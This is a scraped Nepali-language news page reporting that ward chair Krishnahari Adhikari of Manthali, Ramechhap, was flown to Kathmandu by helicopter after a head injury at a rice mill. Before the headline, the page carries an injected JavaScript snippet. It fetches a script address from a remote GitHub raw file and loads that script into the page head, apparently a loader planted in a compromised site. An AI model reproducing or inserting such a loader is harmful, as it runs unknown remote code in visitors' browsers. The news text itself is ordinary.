;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); गेलुका वडा अध्यक्ष अधिकारीलाई हेलिकप्टरबाट काठमाडौं लगियो – जुनेली न्युज
मङ्लबार, असार ११, २०८२
  • होमपेज
  • गेलुका वडा अध्यक्ष अधिकारीलाई हेलिकप्टरबाट काठमाडौं लगियो
देश/प्रदेश

गेलुका वडा अध्यक्ष अधिकारीलाई हेलिकप्टरबाट काठमाडौं लगियो

मंसिर २०, फाइल फोटो

रामेछाप । रामेछापको मन्थली नगरपालिका वडा नं १२ गेलुबाट एक जनाको हेलिकप्टरबाट उद्धार गरिएको छ ।

नेकपा मन्थली नगर कमिटी अध्यक्षसमेत मन्थली वडा नं १२ गेलुका अध्यक्ष कृष्णहरी अधिकारीलाई शनिबार उपचारको लागि काठमाडौं लगिएको सोही वडा सदस्य राधिका खड्काले जुनेली न्युलाई जानकारी दिइन् ।

उनका अनुसार अध्यक्ष अधिकारीलाई धानपिस्ने मेलको फिताले बेरेर टाउकोमा गहिरो चोट लागेर गम्भीर घाइते भैई याँहा उपचार हुन सक्ने अवस्था गरहेपछि हेलिकप्टच चार्टर गरेर काठमाडं लगिएको हो ।

उनको अहिले काठमाडौंको मेडिसिटी अस्पतालमा उपचार भैरहेको उनले बताईन् ।

वडा अध्यक्ष कृष्णहरी अधिकारी

Image may contain: 5 people, people standing

फेसबुक प्रतिक्रियाहरु